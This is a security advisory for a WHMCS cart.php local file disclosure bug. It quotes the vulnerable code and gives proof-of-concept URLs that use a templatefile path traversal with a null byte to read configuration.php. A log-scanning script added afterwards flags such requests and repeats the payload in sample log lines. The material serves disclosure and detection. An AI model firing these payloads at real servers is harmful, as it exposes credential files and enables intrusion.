# Title: WHMCompleteSolution (cart.php) Local File Disclosure
# Author : Lagripe-Dz
# Product: WHMCS ( WHMCompleteSolution )
# Vendor : http://whmcs.com/
# Date : 10/01/2011
# Version: 3.x.x , 4.0.x
# Tested on: linux+apache
================================================================

Vuln file: cart.php
---------

Vuln code:
---------

if ( $a == "add" ) {
    $templatefile = "configureproductdomain";
    ....etc
}

if ( $a == "login" ) {
    $templatefile = "login";
    ....etc
}

...

outputClientArea( $templatefile, $nowrapper );

# The outputClientArea function will display "./templates/orderforms/cart/{$templatefile}.tpl"

Details :
---------

When "$a" matches one of the expected values, the script sets "$templatefile" to its default.
When "$a" does not match any of the default values, "$templatefile" can be controlled
through the request and used for file disclosure.

Proof of Concept :
------------------

http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00

http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00

Note: view the page source to see the disclosed file.

Solution :
----------

Vendor notified; update to the latest version.

================================================================
Greetz To All www.Sec4ever.com Members.
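
Added example (not part of the original advisory and not WHMCS code): a log check that flags cart.php requests carrying a "templatefile" parameter, the condition described under Details. The log lines, the /whmcs/ path and the rule that any client-supplied "templatefile" deserves review are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache common log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2011:10:00:01 +0000] "GET /whmcs/cart.php?a=add&pid=3 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Jan/2011:10:00:07 +0000] "GET /whmcs/cart.php?a=test&templatefile=../../../configuration.php%00 HTTP/1.1" 200 812
198.51.100.2 - - [10/Jan/2011:10:01:00 +0000] "GET /whmcs/cart.php?a=login HTTP/1.1" 200 4300
198.51.100.7 - - [10/Jan/2011:10:02:00 +0000] "GET /whmcs/cart.php?a=zz&templatefile=viewcart HTTP/1.1" 200 4100
198.51.100.8 - - [10/Jan/2011:10:03:00 +0000] "GET /whmcs/index.php?templatefile=../x HTTP/1.1" 404 210
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return the reasons a decoded templatefile value deserves review."""
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if ".." in value or "/" in value or "\\" in value:
        reasons.append("path-traversal")
    # Assumption: the excerpt assigns $templatefile server-side, so a
    # client-supplied value is flagged even when it is a plain name.
    return reasons or ["client-supplied-template"]


def scan(log_text):
    """Return (client_ip, raw_target, reasons) for suspicious cart.php hits."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/cart.php"):
            continue
        # parse_qs percent-decodes once, so %00 becomes a real NUL here.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("templatefile", []):
            findings.append((client, target, classify(value)))
    return findings


if __name__ == "__main__":
    for client, target, reasons in scan(SAMPLE_LOG):
        print(client, ",".join(reasons), target)
```

Parameters sent in a POST body do not appear in access logs, so this check covers query strings only.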